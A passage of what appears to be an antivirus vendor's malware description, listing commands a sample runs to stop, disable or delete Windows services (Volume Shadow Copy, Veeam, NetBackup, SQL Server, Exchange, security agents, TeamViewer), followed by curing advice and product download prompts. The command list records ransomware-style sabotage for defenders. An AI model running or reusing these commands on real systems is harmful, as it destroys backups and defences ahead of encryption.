  • '<SYSTEM32>\net1.exe' stop "Alibaba Security Aegis Detect Service"
  • '<SYSTEM32>\net1.exe' stop VeeamCatalogSvc
  • '<SYSTEM32>\net1.exe' stop MSSQL$SQL2008
  • '<SYSTEM32>\sc.exe' config MSSQL$VIM_SQLEXP start=disabled
  • '<SYSTEM32>\sc.exe' delete 2345PicSvc
  • '<SYSTEM32>\sc.exe' delete VisualSVNServer
  • '<SYSTEM32>\sc.exe' delete zyb_sync
  • '<SYSTEM32>\sc.exe' delete VirboxWebServer
  • '<SYSTEM32>\net1.exe' stop "MsDtsServer100"
  • '<SYSTEM32>\net1.exe' stop MSSQL$VIM_SQLEXP
  • '<SYSTEM32>\net1.exe' stop AutoUpdateService
  • '<SYSTEM32>\net1.exe' stop AdobeARMservice
  • '<SYSTEM32>\net1.exe' stop MSExchangeHM
  • '<SYSTEM32>\sc.exe' delete Protect_2345Explorer
  • '<SYSTEM32>\sc.exe' delete vsvnjobsvc
  • '<SYSTEM32>\sc.exe' delete smtpsvrJT
  • '<SYSTEM32>\sc.exe' delete TPlusStdUpgradeService1300
  • '<SYSTEM32>\sc.exe' delete btPanel
  • '<SYSTEM32>\sc.exe' delete MotionBoardRCService57
  • '<SYSTEM32>\sc.exe' delete MSMQ
  • '<SYSTEM32>\sc.exe' delete TPlusStdTaskService1300
  • '<SYSTEM32>\sc.exe' config SQLANYs_Sage_FAS_Fixed_Assets start=disabled
  • '<SYSTEM32>\net1.exe' stop "MSSQLServerOLAPService"
  • '<SYSTEM32>\net1.exe' stop CASWebServer
  • '<SYSTEM32>\net1.exe' stop FirebirdServerDefaultInstance
  • '<SYSTEM32>\net1.exe' stop MSExchangeFrontEndTransport
  • '<SYSTEM32>\sc.exe' delete TPlusStdAppService1300
  • '<SYSTEM32>\sc.exe' delete FTA
  • '<SYSTEM32>\net1.exe' stop SBOWFDataAccess
  • '<SYSTEM32>\net1.exe' stop MSExchangeDiagnostics
  • '<SYSTEM32>\sc.exe' delete ReportServer
  • '<SYSTEM32>\sc.exe' delete "Flash Helper Service"
  • '<SYSTEM32>\net1.exe' stop VMnetDHCP
  • '<SYSTEM32>\net1.exe' stop FirebirdGuardianDeafaultInstance
  • '<SYSTEM32>\net1.exe' stop MSExchangeCompliance
  • '<SYSTEM32>\net1.exe' stop "NetBackup Legacy Network Service"
  • '<SYSTEM32>\sc.exe' delete qemu-ga
  • '<SYSTEM32>\sc.exe' delete SPAdminV4
  • '<SYSTEM32>\sc.exe' delete VMUSBArbService
  • '<SYSTEM32>\sc.exe' delete TeamViewer
  • '<SYSTEM32>\sc.exe' config vss start=disabled
  • '<SYSTEM32>\sc.exe' delete SPSearchHostController
  • '<SYSTEM32>\net1.exe' stop "MSSQL$VEEAMSQL2012"
  • '<SYSTEM32>\sc.exe' config "MSSQL$PROGID" start= disabled
  • '<SYSTEM32>\net1.exe' stop "NetBackup Legacy Client Service"
  • '<SYSTEM32>\net1.exe' stop MSExchangeAntispamUpdate
  • '<SYSTEM32>\net1.exe' stop DellDRLogSvc
  • '<SYSTEM32>\net1.exe' stop mysqltransport
  • '<SYSTEM32>\sc.exe' delete VMAuthdService
  • '<SYSTEM32>\sc.exe' delete ProjectQueueService16
  • '<SYSTEM32>\sc.exe' delete wwbizsrv
  • '<SYSTEM32>\sc.exe' delete MSDTC
  • '<SYSTEM32>\net1.exe' stop vss
  • '<SYSTEM32>\sc.exe' config "TMBMServer" start= disabled
  • '<SYSTEM32>\sc.exe' delete "wanxiao-monitor"
  • '<SYSTEM32>\sc.exe' delete allpass_redisservice_port21160
  • '<SYSTEM32>\sc.exe' delete AlibabaProtect
  • '<SYSTEM32>\sc.exe' delete VMwareHostd
  • '<SYSTEM32>\net1.exe' stop SQLWriter
  • '<SYSTEM32>\sc.exe' config vmvss start=disabled
  • '<SYSTEM32>\sc.exe' delete SPTraceV4
  • '<SYSTEM32>\net1.exe' stop MSSQL$FE_EXPRESS
  • '<SYSTEM32>\sc.exe' delete MMRHookService
  • '<SYSTEM32>\sc.exe' delete OSearch16
  • '<SYSTEM32>\sc.exe' delete OpenSSHd
  • '<SYSTEM32>\sc.exe' delete "Sense Shield Service"
  • '<SYSTEM32>\net1.exe' stop vmvss
  • '<SYSTEM32>\net1.exe' stop "MSSQL"
  • '<SYSTEM32>\net1.exe' stop Tomcat8
  • '<SYSTEM32>\net1.exe' stop JWRinfoClientService
  • '<SYSTEM32>\net1.exe' stop MSExchangeDelivery
  • '<SYSTEM32>\net1.exe' stop "NetBackup SAN Client Fibre Transport Service"
  • '<SYSTEM32>\sc.exe' delete kbasesrv
  • '<SYSTEM32>\sc.exe' delete VmAgentDaemon
  • '<SYSTEM32>\sc.exe' delete "Kiwi Syslog Server"
  • '<SYSTEM32>\sc.exe' delete "AHS SERVICE"
  • '<SYSTEM32>\sc.exe' delete "UWS HiPriv Services"
  • '<SYSTEM32>\sc.exe' config SQLWriter start=disabled
  • '<SYSTEM32>\sc.exe' delete ZTEVdservice
  • '<SYSTEM32>\sc.exe' delete SPTimerV4
  • '<SYSTEM32>\sc.exe' delete "vm-agent"
  • '<SYSTEM32>\sc.exe' delete RabbitMQ
  • '<SYSTEM32>\net1.exe' stop "VMware NAT Service"
  • '<SYSTEM32>\net1.exe' stop JWEM3DBAUTORun
  • '<SYSTEM32>\net1.exe' stop MSExchangeDagMgmt
  • '<SYSTEM32>\net1.exe' stop "NetBackup Proxy Service"
  • '<SYSTEM32>\net1.exe' stop "SQLAgent$VEEAMSQL2012"
  • '<SYSTEM32>\net1.exe' stop TeamViewer
  • '<SYSTEM32>\net1.exe' stop SBOWorkflowEngine

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk , mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.
Free trial

 

Download Dr.Web

Download by serial number

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

Free trial

 

Download Dr.Web

Download by serial number

Download on App Store

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

 

Download Dr.Web

Download by serial number

  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web for Android onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android

Free trial

14 days

Download now
Get it on Google Play